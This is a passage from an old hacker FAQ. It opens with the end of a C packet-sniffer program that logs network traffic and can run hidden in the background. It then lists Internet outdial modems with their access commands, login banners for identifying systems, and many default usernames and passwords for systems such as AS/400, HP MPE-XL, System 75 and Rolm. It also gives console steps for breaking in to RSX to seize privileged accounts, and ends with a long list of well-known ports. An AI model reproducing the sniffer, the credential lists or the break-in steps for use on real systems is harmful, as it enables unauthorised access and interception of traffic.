{ char *buf,*getpass(),*crypt();

  char pwd[21],prmpt[81];



    strcpy(pwd,AUTHPASSWD);

    sprintf(prmpt,"(%s)UP? ",ProgName);

    buf=getpass(prmpt);

    if(strcmp(pwd,crypt(buf,pwd)))

        exit(1);

}

    */

void main(argc, argv)

int argc;

char **argv;

{

    char   cbuf[BUFSIZ];

    struct ifconf ifc;

    int    s,

           ac=1,

           backg=0;



    ProgName=argv[0];



 /*     getauth(); */



    LOG=NULL;

    device=NULL;

    while((ac<argc) && (argv[ac][0] == '-')) {

       register char ch = argv[ac++][1];

       switch(toupper(ch)) {

            case 'I': device=argv[ac++];

                      break;

            case 'F': if(!(LOG=fopen((LogName=argv[ac++]),"a")))

                         Zexit(1,"Output file cant be opened\n");

                      break;

            case 'B': backg=1;

                      break;

            case 'D': debug=1;

                      break;

            default : fprintf(ERR,

                        "Usage: %s [-b] [-d] [-i interface] [-f file]\n",

                            ProgName);

                      exit(1);

       }

    }



    if(!device) {

        if((s=socket(AF_INET, SOCK_DGRAM, 0)) < 0)

            Pexit(1,"Eth: socket");



        ifc.ifc_len = sizeof(cbuf);

        ifc.ifc_buf = cbuf;

        if(ioctl(s, SIOCGIFCONF, (char *)&ifc) < 0)

            Pexit(1,"Eth: ioctl");



        close(s);

        device = ifc.ifc_req->ifr_name;

    }



    fprintf(ERR,"Using logical device %s [%s]\n",device,NIT_DEV);

    fprintf(ERR,"Output to %s.%s%s",(LOG)?LogName:"stdout",

            (debug)?" (debug)":"",(backg)?" Backgrounding ":"\n");



    if(!LOG)

        LOG=stdout;



    signal(SIGINT, death);

    signal(SIGTERM,death);

    signal(SIGKILL,death);

    signal(SIGQUIT,death);



    if(backg && debug) {

         fprintf(ERR,"[Cannot bg with debug on]\n");

         backg=0;

    }



    if(backg) {

        register int s;



        if((s=fork())>0) {

           fprintf(ERR,"[pid %d]\n",s);

           exit(0);

        } else if(s<0)

           Pexit(1,"fork");



        if( (s=open("/dev/tty",O_RDWR))>0 ) {

                ioctl(s,TIOCNOTTY,(char *)NULL);

                close(s);

        }

    }

    fprintf(LOG,"\nLog started at => %s [pid %d]\n",NOWtm(),getpid());

    fflush(LOG);



    do_it();

}





18. What is an Internet Outdial?



An Internet outdial is a modem connected to the Internet than you can

use to dial out.  Normal outdials will only call local numbers.  A GOD

(Global OutDial) is capable of calling long distance.  Outdials are an

inexpensive method of calling long distance BBS's.





19. What are some Internet Outdials?





Area    Address(s)                      Command(s)

------  ------------------------------- ---------------------

201     128.112.88.0

	128.112.88.1

	128.112.88.2

	128.112.88.3

204     umnet.cc.manitoba.ca            "dial12" or "dial24"

206     dialout24.cac.washington.edu

215     wiseowl.ocis.temple.edu         atz

					atdt 9xxxyyyy

	129.72.1.59                     hayes compat

218     aa28.d.umn.edu                  cli

					rlogin modem

					at "login:" type 

					"modem"

	modem.d.umn.edu                 "Hayes"

232     isn.rdns.iastate.edu            MODEM              [Works!!]

					atz 

					atdt8xxx-xxxx

303     129.82.100.64                   login: modem       [need password!]

307     modem.uwyo.edu

	129.72.1.59                     hayes compat

313     35.1.1.6                        "dial2400-aa" or   [can't connect]

					"dial1200-aa"

315     198.36.22.3                     "modem"

404     emory.edu                       .modem8 or

					.dialout

	broadband.cc.emory.edu          .modem8 or

					.dialout

	128.140.1.239                   .modem8|CR

					or .modem96|CR

412     gate.cis.pitt.edu               LAT

					connect dialout

					^E

					atdt 91k xxx-xxxx

415     128.32.132.250                  "dial1" or "dial2"

416     pacx.utcs.utoronto.ca           modem

					atdt 9xxx-xxxx

502     uknet.uky.edu                   outdial2400

					atdt 9xxx-xxxx

510     annex132-1.eecs.berkeley.edu    atdt 9,,,,, xxx-xxxx

514     132.204.2.11                    externe#9 9xxx-xxxx

515     isn.rdns.iastate.edu            login MODEM 

					dial atdt8xxx-yyyy

602     129.219.17.3                    atdt8,,,,,xyyyxxxyyyy

	129.219.17.3                    login: MODEM

					atdt 8xxx-xxxx

609     129.72.1.59                     "Hayes"

	128.119.131.110                 "Hayes"

	128.119.131.111         

	128.119.131.112

	128.119.131.113

	128.119.131.114

	128.112.131.110

	128.112.131.111

	128.112.131.112

	128.112.131.113

	128.112.131.114                 the above are hayes

614     ns2400.ircc.ohio-state.edu      DIAL               [can't connect]

615     dca.utk.edu                     "dial2400"

617     dialout.lcs.mit.edu

619     dialin.ucsd.edu                 "dialout"

	128.54.30.1                     nue

713     128.143.70.101                  "connect hayes"

	128.249.27.154                  c modem96

					atdt 9xxx-xxxx

	128.249.27.153                  " -+ as above +- "

	modem24.bcm.tmc.edu

	modem12.bcm.tmc.edu

714     130.191.4.70                    atdt 8xxx-xxxx

804     ublan.acc.virginia.edu          c hayes

	128.143.70.101                  connect hayes

					atdt xxx-xxxx

902     star.ccs.tuns.ca                "dialout"          [down...]

916     128.120.2.251                   "dialout"          [down...]

	129.137.33.72                                      [can't connect]

???     dialout1.princeton.edu                             [can't connect]

	dswitch.byu.edu                 "C Modem"          [can't connect]

	modem.cis.uflu.edu                                 [can't connect]

	r596adi1.uc.edu                                    [can't connect]

	vtnet1.cns.ut.edu               "CALL" or "call"   [can't connect]

	18.26.0.55                                         [can't connect]

	128.173.5.4                                        [need password!]

	128.187.1.2                                        [need password!]

	129.137.33.71                                      [can't connect]

	bstorm.bga.com / port=4000                         [what is this?]





20. What is this system?



AS/400

~~~~~~

UserID?

Password?



Once in, type GO MAIN





CDC Cyber

~~~~~~~~~

WELCOME TO THE NOS SOFTWARE SYSTEM.

COPYRIGHT CONTROL DATA 1978, 1987.



88/02/16. 02.36.53. N265100

CSUS CYBER 170-730.                     NOS 2.5.2-678/3.

FAMILY:



You would normally just hit return at the family prompt.  Next prompt is:



USER NAME:





Hewlett Packard MPE-XL

~~~~~~~~~~~~~~~~~~~~~~

MPE XL:

EXPECTED A :HELLO COMMAND. (CIERR 6057)

MPE XL:

EXPECTED [SESSION NAME,] USER.ACCT [,GROUP]   (CIERR 1424)

MPE XL:





GTN

~~~

WELCOME TO CITIBANK. PLEASE SIGN ON.

XXXXXXXX



@

PASSWORD =



@



=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



PLEASE ENTER YOUR ID:-1->

PLEASE ENTER YOUR PASSWORD:-2->



CITICORP (CITY NAME). KEY GHELP FOR HELP.

  XXX.XXX

 PLEASE SELECT SERVICE REQUIRED.-3->





PRIMOS

~~~~~~

PRIMENET 19.2.7F PPOA1



<any text>



ER!



=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



CONNECT

Primenet V 2.3  (system)

LOGIN           (you)

User id?        (system)

SAPB5           (you)

Password?       (system)

DROWSAP         (you)

OK,             (system)





ROLM-OSL

~~~~~~~~

MARAUDER10292  01/09/85(^G) 1 03/10/87  00:29:47

RELEASE 8003

OSL, PLEASE.

?





Tops-10

~~~~~~~

NIH Timesharing



NIH Tri-SMP 7.02-FF  16:30:04 TTY11

system 1378/1381/1453 Connected to Node Happy(40) Line # 12

Please LOGIN

.





VM/370

~~~~~~

VM/370

!





21. What are the default accounts for XXX?



AIX

~~~

guest           guest

guest           *



AS/400

~~~~~~

qsecofr         qsecofr         /* master security officer */

qsysopr         qsysopr         /* system operator         */

qpgmr           qpgmr           /* default programmer      */



also



ibm/password

ibm/2222

ibm/service

qsecofr/1111111

qsecofr/2222222

qsvr/qsvr

secofr/secofr





Hewlett Packard MPE-XL

~~~~~~~~~~~~~~~~~~~~~~

HELLO           MANAGER.SYS

HELLO           MGR.SYS

HELLO           FIELD.SUPPORT     HPUNSUP or SUPPORT or HP

HELLO           OP.OPERATOR

MGR             CAROLIAN

MGR             CCC

MGR             CNAS

MGR             CONV

MGR             COGNOS

OPERATOR        COGNOS

MANAGER         COGNOS

OPERATOR        DISC

MGR             HPDESK

MGR             HPWORD

FIELD           HPWORD

MGR             HPOFFICE

SPOOLMAN        HPOFFICE

ADVMAIL         HPOFFICE

MAIL            HPOFFICE

WP              HPOFFICE

MANAGER         HPOFFICE

MGR             HPONLY

FIELD           HPP187

MGR             HPP187

MGR             HPP189

MGR             HPP196

MGR             INTX3

MGR             ITF3000

MANAGER         ITF3000

MAIL            MAIL

MGR             NETBASE

MGR             REGO

MGR             RJE

MGR             ROBELLE

MANAGER         SECURITY

MGR             SECURITY

FIELD           SERVICE

MANAGER         SYS

MGR             SYS

PCUSER          SYS

RSBCMON         SYS

OPERATOR        SYS

OPERATOR        SYSTEM

FIELD           SUPPORT

OPERATOR        SUPPORT

MANAGER         TCH

MAIL            TELESUP

MANAGER         TELESUP

MGR             TELESUP

SYS             TELESUP

MGE             VESOFT

MGE             VESOFT

MGR             WORD

MGR             XLSERVER



Common jobs are Pub, Sys, Data

Common passwords are HPOnly, TeleSup, HP, MPE, Manager, MGR, Remote





PICK O/S

~~~~~~~~

DSA             # Desquetop System Administrator

DS

DESQUETOP

PHANTOM





Prolog

~~~~~~

PBX             PBX

NETWORK         NETWORK

NETOP           <null>





Rolm

~~~~

CBX Defaults



op              op

op              operator

su              super

admin           pwp

eng             engineer





PhoneMail Defaults



sysadmin        sysadmin

tech            tech

poll            tech





RSX

~~~

SYSTEM/SYSTEM   (Username SYSTEM, Password SYSTEM)

1,1/system      (Directory [1,1] Password SYSTEM)

BATCH/BATCH

SYSTEM/MANAGER

USER/USER



Default accounts for Micro/RSX:



		MICRO/RSX



Alternately you can hit <CTRL-Z>  when the boot sequence asks you for the

date and create an account using:



		RUN ACNT

	    or  RUN $ACNT



(Numbers below 10 {oct} are Priveleged)



Reboot and wait for the date/time question. Type ^C and at the MCR prompt,

type "abo at." You must include the . dot!



If this works, type "acs lb0:/blks=1000" to get some swap space so the

new step won't wedge.



type " run $acnt" and change the password of any account with a group

number of 7 or less.



You may find that the ^C does not work. Try ^Z and ESC as well.

Also try all 3 as terminators to valid and invalid times.



If none of the above work, use the halt switch to halt the system,

just after a invalid date-time.  Look for a user mode PSW 1[4-7]xxxx.

then deposit 177777 into R6, cross your fingers, write protect the drive

and continue the system.  This will hopefully result in indirect blowing

up...  And hopefully the system has not been fully secured.





System 75

~~~~~~~~~

bcim            bcimpw

bciim           bciimpw

bcms            bcmspw, bcms

bcnas           bcnspw

blue            bluepw

browse          looker, browsepw

craft           crftpw, craftpw, crack

cust            custpw

enquiry         enquirypw

field           support

inads           indspw, inadspw, inads

init            initpw

kraft           kraftpw

locate          locatepw

maint           maintpw, rwmaint

nms             nmspw

rcust           rcustpw

support         supportpw

tech            field





Taco Bell

~~~~~~~~~

rgm             rollout

tacobell        <null>



		  

Verifone Junior 2.05

~~~~~~~~~~~~~~~~~~~~

Default password: 166816





VMS

~~~

field           service

systest         utep





22. What port is XXX on?



The file /etc/services on most Unix machines lists the activity

occurring on each port.  Here is the most complete port list in

existence, originally presented in RFC 1340:



Keyword         Decimal    Description

-------         -------    -----------

                  0/tcp    Reserved

                  0/udp    Reserved

tcpmux            1/tcp    TCP Port Service Multiplexer

tcpmux            1/udp    TCP Port Service Multiplexer

compressnet       2/tcp    Management Utility

compressnet       2/udp    Management Utility

compressnet       3/tcp    Compression Process

compressnet       3/udp    Compression Process

                  4/tcp    Unassigned

                  4/udp    Unassigned

rje               5/tcp    Remote Job Entry

rje               5/udp    Remote Job Entry

                  6/tcp    Unassigned

                  6/udp    Unassigned

echo              7/tcp    Echo

echo              7/udp    Echo

                  8/tcp    Unassigned

                  8/udp    Unassigned

discard           9/tcp    Discard

discard           9/udp    Discard

                 10/tcp    Unassigned

                 10/udp    Unassigned

systat           11/tcp    Active Users

systat           11/udp    Active Users

                 12/tcp    Unassigned

                 12/udp    Unassigned

daytime          13/tcp    Daytime

daytime          13/udp    Daytime

                 14/tcp    Unassigned

                 14/udp    Unassigned

                 15/tcp    Unassigned [was netstat]

                 15/udp    Unassigned

                 16/tcp    Unassigned

                 16/udp    Unassigned

qotd             17/tcp    Quote of the Day

qotd             17/udp    Quote of the Day

msp              18/tcp    Message Send Protocol

msp              18/udp    Message Send Protocol

chargen          19/tcp    Character Generator

chargen          19/udp    Character Generator

ftp-data         20/tcp    File Transfer [Default Data]

ftp-data         20/udp    File Transfer [Default Data]

ftp              21/tcp    File Transfer [Control]

ftp              21/udp    File Transfer [Control]

                 22/tcp    Unassigned

                 22/udp    Unassigned

telnet           23/tcp    Telnet

telnet           23/udp    Telnet

                 24/tcp    any private mail system

                 24/udp    any private mail system

smtp             25/tcp    Simple Mail Transfer

smtp             25/udp    Simple Mail Transfer

                 26/tcp    Unassigned

                 26/udp    Unassigned

nsw-fe           27/tcp    NSW User System FE

nsw-fe           27/udp    NSW User System FE

                 28/tcp    Unassigned

                 28/udp    Unassigned

msg-icp          29/tcp    MSG ICP

msg-icp          29/udp    MSG ICP

                 30/tcp    Unassigned

                 30/udp    Unassigned

msg-auth         31/tcp    MSG Authentication

msg-auth         31/udp    MSG Authentication

                 32/tcp    Unassigned

                 32/udp    Unassigned

dsp              33/tcp    Display Support Protocol

dsp              33/udp    Display Support Protocol

                 34/tcp    Unassigned

                 34/udp    Unassigned

                 35/tcp    any private printer server

                 35/udp    any private printer server

                 36/tcp    Unassigned

                 36/udp    Unassigned

time             37/tcp    Time

time             37/udp    Time

                 38/tcp    Unassigned

                 38/udp    Unassigned

rlp              39/tcp    Resource Location Protocol

rlp              39/udp    Resource Location Protocol

                 40/tcp    Unassigned

                 40/udp    Unassigned

graphics         41/tcp    Graphics

graphics         41/udp    Graphics

nameserver       42/tcp    Host Name Server

nameserver       42/udp    Host Name Server

nicname          43/tcp    Who Is

nicname          43/udp    Who Is

mpm-flags        44/tcp    MPM FLAGS Protocol

mpm-flags        44/udp    MPM FLAGS Protocol

mpm              45/tcp    Message Processing Module [recv]

mpm              45/udp    Message Processing Module [recv]

mpm-snd          46/tcp    MPM [default send]

mpm-snd          46/udp    MPM [default send]

ni-ftp           47/tcp    NI FTP

ni-ftp           47/udp    NI FTP

                 48/tcp    Unassigned

                 48/udp    Unassigned

login            49/tcp    Login Host Protocol

login            49/udp    Login Host Protocol

re-mail-ck       50/tcp    Remote Mail Checking Protocol

re-mail-ck       50/udp    Remote Mail Checking Protocol

la-maint         51/tcp    IMP Logical Address Maintenance

la-maint         51/udp    IMP Logical Address Maintenance

xns-time         52/tcp    XNS Time Protocol

xns-time         52/udp    XNS Time Protocol

domain           53/tcp    Domain Name Server

domain           53/udp    Domain Name Server

xns-ch           54/tcp    XNS Clearinghouse

xns-ch           54/udp    XNS Clearinghouse

isi-gl           55/tcp    ISI Graphics Language

isi-gl           55/udp    ISI Graphics Language

xns-auth         56/tcp    XNS Authentication

xns-auth         56/udp    XNS Authentication

                 57/tcp    any private terminal access

                 57/udp    any private terminal access

xns-mail         58/tcp    XNS Mail

xns-mail         58/udp    XNS Mail

                 59/tcp    any private file service

                 59/udp    any private file service

                 60/tcp    Unassigned

                 60/udp    Unassigned

ni-mail          61/tcp    NI MAIL

ni-mail          61/udp    NI MAIL

acas             62/tcp    ACA Services

acas             62/udp    ACA Services

via-ftp          63/tcp    VIA Systems - FTP

via-ftp          63/udp    VIA Systems - FTP

covia            64/tcp    Communications Integrator (CI)

covia            64/udp    Communications Integrator (CI)

tacacs-ds        65/tcp    TACACS-Database Service

tacacs-ds        65/udp    TACACS-Database Service

sql*net          66/tcp    Oracle SQL*NET

sql*net          66/udp    Oracle SQL*NET

bootps           67/tcp    Bootstrap Protocol Server

bootps           67/udp    Bootstrap Protocol Server

bootpc           68/tcp    Bootstrap Protocol Client

bootpc           68/udp    Bootstrap Protocol Client

tftp             69/tcp    Trivial File Transfer

tftp             69/udp    Trivial File Transfer

gopher           70/tcp    Gopher

gopher           70/udp    Gopher

netrjs-1         71/tcp    Remote Job Service

netrjs-1         71/udp    Remote Job Service

netrjs-2         72/tcp    Remote Job Service

netrjs-2         72/udp    Remote Job Service

netrjs-3         73/tcp    Remote Job Service

netrjs-3         73/udp    Remote Job Service

netrjs-4         74/tcp    Remote Job Service

netrjs-4         74/udp    Remote Job Service

                 75/tcp    any private dial out service

                 75/udp    any private dial out service

                 76/tcp    Unassigned

                 76/udp    Unassigned

                 77/tcp    any private RJE service

                 77/udp    any private RJE service

vettcp           78/tcp    vettcp

vettcp           78/udp    vettcp

finger           79/tcp    Finger

finger           79/udp    Finger

www              80/tcp    World Wide Web HTTP

www              80/udp    World Wide Web HTTP

hosts2-ns        81/tcp    HOSTS2 Name Server

hosts2-ns        81/udp    HOSTS2 Name Server

xfer             82/tcp    XFER Utility

xfer             82/udp    XFER Utility

mit-ml-dev       83/tcp    MIT ML Device

mit-ml-dev       83/udp    MIT ML Device

ctf              84/tcp    Common Trace Facility

ctf              84/udp    Common Trace Facility

mit-ml-dev       85/tcp    MIT ML Device

mit-ml-dev       85/udp    MIT ML Device

mfcobol          86/tcp    Micro Focus Cobol

mfcobol          86/udp    Micro Focus Cobol

                 87/tcp    any private terminal link

                 87/udp    any private terminal link

kerberos         88/tcp    Kerberos

kerberos         88/udp    Kerberos

su-mit-tg        89/tcp    SU/MIT Telnet Gateway

su-mit-tg        89/udp    SU/MIT Telnet Gateway

dnsix            90/tcp    DNSIX Securit Attribute Token Map

dnsix            90/udp    DNSIX Securit Attribute Token Map

mit-dov          91/tcp    MIT Dover Spooler

mit-dov          91/udp    MIT Dover Spooler

npp              92/tcp    Network Printing Protocol

npp              92/udp    Network Printing Protocol

dcp              93/tcp    Device Control Protocol

dcp              93/udp    Device Control Protocol

objcall          94/tcp    Tivoli Object Dispatcher

objcall          94/udp    Tivoli Object Dispatcher

supdup           95/tcp    SUPDUP

supdup           95/udp    SUPDUP

dixie            96/tcp    DIXIE Protocol Specification

dixie            96/udp    DIXIE Protocol Specification

swift-rvf        97/tcp    Swift Remote Vitural File Protocol

swift-rvf        97/udp    Swift Remote Vitural File Protocol

tacnews          98/tcp    TAC News

tacnews          98/udp    TAC News

metagram         99/tcp    Metagram Relay

metagram         99/udp    Metagram Relay

newacct         100/tcp    [unauthorized use]

hostname        101/tcp    NIC Host Name Server

hostname        101/udp    NIC Host Name Server

iso-tsap        102/tcp    ISO-TSAP

iso-tsap        102/udp    ISO-TSAP

gppitnp         103/tcp    Genesis Point-to-Point Trans Net

gppitnp         103/udp    Genesis Point-to-Point Trans Net

acr-nema        104/tcp    ACR-NEMA Digital Imag. & Comm. 300

acr-nema        104/udp    ACR-NEMA Digital Imag. & Comm. 300

csnet-ns        105/tcp    Mailbox Name Nameserver

csnet-ns        105/udp    Mailbox Name Nameserver

3com-tsmux      106/tcp    3COM-TSMUX

3com-tsmux      106/udp    3COM-TSMUX

rtelnet         107/tcp    Remote Telnet Service

rtelnet         107/udp    Remote Telnet Service

snagas          108/tcp    SNA Gateway Access Server

snagas          108/udp    SNA Gateway Access Server

pop2            109/tcp    Post Office Protocol - Version 2

pop2            109/udp    Post Office Protocol - Version 2

pop3            110/tcp    Post Office Protocol - Version 3

pop3            110/udp    Post Office Protocol - Version 3

sunrpc          111/tcp    SUN Remote Procedure Call

sunrpc          111/udp    SUN Remote Procedure Call

mcidas          112/tcp    McIDAS Data Transmission Protocol

mcidas          112/udp    McIDAS Data Transmission Protocol

auth            113/tcp    Authentication Service

auth            113/udp    Authentication Service

audionews       114/tcp    Audio News Multicast

audionews       114/udp    Audio News Multicast

sftp            115/tcp    Simple File Transfer Protocol

sftp            115/udp    Simple File Transfer Protocol

ansanotify      116/tcp    ANSA REX Notify

ansanotify      116/udp    ANSA REX Notify

uucp-path       117/tcp    UUCP Path Service

uucp-path       117/udp    UUCP Path Service

sqlserv         118/tcp    SQL Services

sqlserv         118/udp    SQL Services

nntp            119/tcp    Network News Transfer Protocol

nntp            119/udp    Network News Transfer Protocol

cfdptkt         120/tcp    CFDPTKT

cfdptkt         120/udp    CFDPTKT

erpc            121/tcp    Encore Expedited Remote Pro.Call

erpc            121/udp    Encore Expedited Remote Pro.Call

smakynet        122/tcp    SMAKYNET

smakynet        122/udp    SMAKYNET

ntp             123/tcp    Network Time Protocol

ntp             123/udp    Network Time Protocol

ansatrader      124/tcp    ANSA REX Trader

ansatrader      124/udp    ANSA REX Trader

locus-map       125/tcp    Locus PC-Interface Net Map Ser

locus-map       125/udp    Locus PC-Interface Net Map Ser

unitary         126/tcp    Unisys Unitary Login

unitary         126/udp    Unisys Unitary Login

locus-con       127/tcp    Locus PC-Interface Conn Server

locus-con       127/udp    Locus PC-Interface Conn Server

gss-xlicen      128/tcp    GSS X License Verification

gss-xlicen      128/udp    GSS X License Verification

pwdgen          129/tcp    Password Generator Protocol

pwdgen          129/udp    Password Generator Protocol

cisco-fna       130/tcp    cisco FNATIVE

cisco-fna       130/udp    cisco FNATIVE

cisco-tna       131/tcp    cisco TNATIVE

cisco-tna       131/udp    cisco TNATIVE

cisco-sys       132/tcp    cisco SYSMAINT

cisco-sys       132/udp    cisco SYSMAINT

statsrv         133/tcp    Statistics Service

statsrv         133/udp    Statistics Service

ingres-net      134/tcp    INGRES-NET Service

ingres-net      134/udp    INGRES-NET Service

loc-srv         135/tcp    Location Service

loc-srv         135/udp    Location Service

profile         136/tcp    PROFILE Naming System

profile         136/udp    PROFILE Naming System

netbios-ns      137/tcp    NETBIOS Name Service

netbios-ns      137/udp    NETBIOS Name Service

netbios-dgm     138/tcp    NETBIOS Datagram Service

netbios-dgm     138/udp    NETBIOS Datagram Service

netbios-ssn     139/tcp    NETBIOS Session Service

netbios-ssn     139/udp    NETBIOS Session Service

emfis-data      140/tcp    EMFIS Data Service

emfis-data      140/udp    EMFIS Data Service

emfis-cntl      141/tcp    EMFIS Control Service

emfis-cntl      141/udp    EMFIS Control Service

bl-idm          142/tcp    Britton-Lee IDM

bl-idm          142/udp    Britton-Lee IDM

imap2           143/tcp    Interim Mail Access Protocol v2

imap2           143/udp    Interim Mail Access Protocol v2

news            144/tcp    NewS

news            144/udp    NewS

uaac            145/tcp    UAAC Protocol

uaac            145/udp    UAAC Protocol

iso-tp0         146/tcp    ISO-IP0

iso-tp0         146/udp    ISO-IP0

iso-ip          147/tcp    ISO-IP

iso-ip          147/udp    ISO-IP

cronus          148/tcp    CRONUS-SUPPORT

cronus          148/udp    CRONUS-SUPPORT

aed-512         149/tcp    AED 512 Emulation Service

aed-512         149/udp    AED 512 Emulation Service

sql-net         150/tcp    SQL-NET

sql-net         150/udp    SQL-NET

hems            151/tcp    HEMS

hems            151/udp    HEMS

bftp            152/tcp    Background File Transfer Program

bftp            152/udp    Background File Transfer Program

sgmp            153/tcp    SGMP

sgmp            153/udp    SGMP

netsc-prod      154/tcp    NETSC

netsc-prod      154/udp    NETSC

netsc-dev       155/tcp    NETSC

netsc-dev       155/udp    NETSC

sqlsrv          156/tcp    SQL Service

sqlsrv          156/udp    SQL Service

knet-cmp        157/tcp    KNET/VM Command/Message Protocol

knet-cmp        157/udp    KNET/VM Command/Message Protocol

pcmail-srv      158/tcp    PCMail Server

pcmail-srv      158/udp    PCMail Server

nss-routing     159/tcp   NSS-Routing

nss-routing     159/udp   NSS-Routing

sgmp-traps      160/tcp    SGMP-TRAPS

sgmp-traps      160/udp    SGMP-TRAPS

snmp            161/tcp    SNMP

snmp            161/udp    SNMP

snmptrap        162/tcp    SNMPTRAP

snmptrap        162/udp    SNMPTRAP

cmip-man        163/tcp    CMIP/TCP Manager

cmip-man        163/udp    CMIP/TCP Manager

cmip-agent      164/tcp    CMIP/TCP Agent

smip-agent      164/udp    CMIP/TCP Agent

xns-courier     165/tcp   Xerox

xns-courier     165/udp   Xerox

s-net           166/tcp    Sirius Systems

s-net           166/udp    Sirius Systems

namp            167/tcp    NAMP

namp            167/udp    NAMP

rsvd            168/tcp    RSVD

rsvd            168/udp    RSVD

send            169/tcp    SEND

send            169/udp    SEND

print-srv       170/tcp    Network PostScript

print-srv       170/udp    Network PostScript

multiplex       171/tcp    Network Innovations Multiplex

multiplex       171/udp    Network Innovations Multiplex

cl/1            172/tcp    Network Innovations CL/1

cl/1            172/udp    Network Innovations CL/1

xyplex-mux      173/tcp    Xyplex

xyplex-mux      173/udp    Xyplex

mailq           174/tcp    MAILQ

mailq           174/udp    MAILQ

vmnet           175/tcp    VMNET

vmnet           175/udp    VMNET

genrad-mux      176/tcp    GENRAD-MUX

genrad-mux      176/udp    GENRAD-MUX

xdmcp           177/tcp    X Display Manager Control Protocol

xdmcp           177/udp    X Display Manager Control Protocol

nextstep        178/tcp    NextStep Window Server

NextStep        178/udp    NextStep Window Server

bgp             179/tcp    Border Gateway Protocol

bgp             179/udp    Border Gateway Protocol

ris             180/tcp    Intergraph

ris             180/udp    Intergraph

unify           181/tcp    Unify

unify           181/udp    Unify

audit           182/tcp    Unisys Audit SITP

audit           182/udp    Unisys Audit SITP

ocbinder        183/tcp    OCBinder

ocbinder        183/udp    OCBinder

ocserver        184/tcp    OCServer

ocserver        184/udp    OCServer

remote-kis      185/tcp    Remote-KIS

remote-kis      185/udp    Remote-KIS

kis             186/tcp    KIS Protocol

kis             186/udp    KIS Protocol

aci             187/tcp    Application Communication Interface

aci             187/udp    Application Communication Interface

mumps           188/tcp    Plus Five's MUMPS

mumps           188/udp    Plus Five's MUMPS

qft             189/tcp    Queued File Transport

qft             189/udp    Queued File Transport

gacp            190/tcp    Gateway Access Control Protocol

cacp            190/udp    Gateway Access Control Protocol

prospero        191/tcp    Prospero

prospero        191/udp    Prospero

osu-nms         192/tcp    OSU Network Monitoring System

osu-nms         192/udp    OSU Network Monitoring System

srmp            193/tcp    Spider Remote Monitoring Protocol

srmp            193/udp    Spider Remote Monitoring Protocol

irc             194/tcp    Internet Relay Chat Protocol

irc             194/udp    Internet Relay Chat Protocol

dn6-nlm-aud     195/tcp    DNSIX Network Level Module Audit

dn6-nlm-aud     195/udp    DNSIX Network Level Module Audit

dn6-smm-red     196/tcp    DNSIX Session Mgt Module Audit Redir

dn6-smm-red     196/udp    DNSIX Session Mgt Module Audit Redir

dls             197/tcp    Directory Location Service

dls             197/udp    Directory Location Service

dls-mon         198/tcp    Directory Location Service Monitor

dls-mon         198/udp    Directory Location Service Monitor

smux            199/tcp    SMUX

smux            199/udp    SMUX

src             200/tcp    IBM System Resource Controller

src             200/udp    IBM System Resource Controller

at-rtmp         201/tcp    AppleTalk Routing Maintenance

at-rtmp         201/udp    AppleTalk Routing Maintenance

at-nbp          202/tcp    AppleTalk Name Binding

at-nbp          202/udp    AppleTalk Name Binding

at-3            203/tcp    AppleTalk Unused

at-3            203/udp    AppleTalk Unused

at-echo         204/tcp    AppleTalk Echo

at-echo         204/udp    AppleTalk Echo

at-5            205/tcp    AppleTalk Unused

at-5            205/udp    AppleTalk Unused

at-zis          206/tcp    AppleTalk Zone Information

at-zis          206/udp    AppleTalk Zone Information

at-7            207/tcp    AppleTalk Unused

at-7            207/udp    AppleTalk Unused

at-8            208/tcp    AppleTalk Unused

at-8            208/udp    AppleTalk Unused

tam             209/tcp    Trivial Authenticated Mail Protocol

tam             209/udp    Trivial Authenticated Mail Protocol

z39.50          210/tcp    ANSI Z39.50

z39.50          210/udp    ANSI Z39.50

914c/g          211/tcp    Texas Instruments 914C/G Terminal

914c/g          211/udp    Texas Instruments 914C/G Terminal

anet            212/tcp    ATEXSSTR

anet            212/udp    ATEXSSTR

ipx             213/tcp    IPX

ipx             213/udp    IPX

vmpwscs         214/tcp    VM PWSCS

vmpwscs         214/udp    VM PWSCS

softpc          215/tcp    Insignia Solutions

softpc          215/udp    Insignia Solutions

atls            216/tcp    Access Technology License Server

atls            216/udp    Access Technology License Server

dbase           217/tcp    dBASE Unix

dbase           217/udp    dBASE Unix

mpp             218/tcp    Netix Message Posting Protocol

mpp             218/udp    Netix Message Posting Protocol

uarps           219/tcp    Unisys ARPs

uarps           219/udp    Unisys ARPs

imap3           220/tcp    Interactive Mail Access Protocol v3

imap3           220/udp    Interactive Mail Access Protocol v3

fln-spx         221/tcp    Berkeley rlogind with SPX auth

fln-spx         221/udp    Berkeley rlogind with SPX auth

fsh-spx         222/tcp    Berkeley rshd with SPX auth

fsh-spx         222/udp    Berkeley rshd with SPX auth

cdc             223/tcp    Certificate Distribution Center

cdc             223/udp    Certificate Distribution Center

                224-241    Reserved

sur-meas        243/tcp    Survey Measurement

sur-meas        243/udp    Survey Measurement

link            245/tcp    LINK

link            245/udp    LINK

dsp3270         246/tcp    Display Systems Protocol

dsp3270         246/udp    Display Systems Protocol

                247-255    Reserved

pawserv         345/tcp    Perf Analysis Workbench

pawserv         345/udp    Perf Analysis Workbench

zserv           346/tcp    Zebra server

zserv           346/udp    Zebra server

fatserv         347/tcp    Fatmen Server

fatserv         347/udp    Fatmen Server

clearcase       371/tcp    Clearcase

clearcase       371/udp    Clearcase

ulistserv       372/tcp    Unix Listserv

ulistserv       372/udp    Unix Listserv

legent-1        373/tcp    Legent Corporation

legent-1        373/udp    Legent Corporation

legent-2        374/tcp    Legent Corporation

legent-2        374/udp    Legent Corporation

exec            512/tcp    remote process execution;

                           authentication performed using

                           passwords and UNIX login names

biff            512/udp    used by mail system to notify users

                           of new mail received; currently

                           receives messages only from

                           processes on the same machine

login           513/tcp    remote login a la telnet;

                           automatic authentication performed

                           based on priviledged port numbers

                           and distributed data bases which

                           identify "authentication domains"

who             513/udp    maintains data bases showing who's

                           logged in to machines on a local

                           net and the load average of the

                           machine

cmd             514/tcp    like exec, but automatic

                           authentication is performed as for

                           login server

syslog          514/udp

printer         515/tcp    spooler

printer         515/udp    spooler

talk            517/tcp    like tenex link, but across

                           machine - unfortunately, doesn't

                           use link protocol (this is actually

                           just a rendezvous port from which a

                           tcp connection is established)

talk            517/udp    like tenex link, but across

                           machine - unfortunately, doesn't

                           use link protocol (this is actually

                           just a rendezvous port from which a

                           tcp connection is established)

ntalk           518/tcp

ntalk           518/udp

utime           519/tcp    unixtime

utime           519/udp    unixtime

